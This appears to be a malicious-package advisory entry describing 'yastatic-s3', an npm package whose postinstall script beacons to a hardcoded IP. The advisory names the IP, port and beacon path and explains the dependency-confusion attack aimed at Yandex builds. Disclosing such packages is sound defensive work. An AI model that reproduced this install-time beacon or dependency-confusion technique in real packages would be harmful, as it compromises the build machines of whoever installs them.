MAL-2026-6586

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6b9f052f01ba026de50b8dd1c26ccb2fe661367414f9139676f94eccaa3b8c50) On install, the package's postinstall lifecycle script issues an HTTP GET to a hardcoded bare IP (130.49.177.51:18080) over plain HTTP, transmitting the package name, version, and a nonce in the query string. This confirms code execution on the installer's machine and reachability to a third-party endpoint without installer consent. The package name 'yastatic-s3' and the beacon path '/p/dc-20260627-yandex-geobase' impersonate Yandex's internal 'yastatic' static-asset / geobase namespace, consistent with a dependency-confusion attack targeting Yandex builds that resolve a private package name from the public npm registry. Installer harm is concrete: any build pipeline that pulls this package contacts the attacker-controlled host at install time, revealing internal build identifiers and demonstrating attacker code execution on the host.